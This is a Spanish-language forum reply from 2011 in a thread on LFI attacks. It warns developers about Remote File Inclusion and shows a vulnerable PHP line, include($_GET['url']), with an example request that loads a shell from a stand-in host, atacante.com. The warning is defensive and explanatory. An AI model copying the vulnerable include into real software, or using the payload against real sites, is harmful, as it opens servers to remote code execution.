Tema: Ataques LFI con imágenes
Ver Mensaje Individual
  #26 (permalink)  
Antiguo 18/12/2011, 14:57
Avatar de Sourcegeek
Sourcegeek
Colaborador
  
Fecha de Ingreso: mayo-2009
Ubicación: $mex['B.C.'];
Mensajes: 1.816
Antigüedad: 14 años, 11 meses
Puntos: 322
Respuesta: Ataques LFI con imágenes
Y ya que están con el tema, cuidado también con los RFI - Remote File Inclusion - que se dá cuando está activada la directiva allow_url_fopen que permite hacer, por ejemplo, includes a páginas externas, permitiendo cargar cosas como shells:

Código PHP: 
Ver original
  1. include($_GET['url']);
  2.  
  3. // index.php?url=http://atacante.com/shell.txt

Saludos!
__________________
Buscas desarrollador web? Sourcegeek. Diseño web, Maquetación y Programación
¡Escribe bien! Esto es un foro, no un Facebook para que escribas con los pies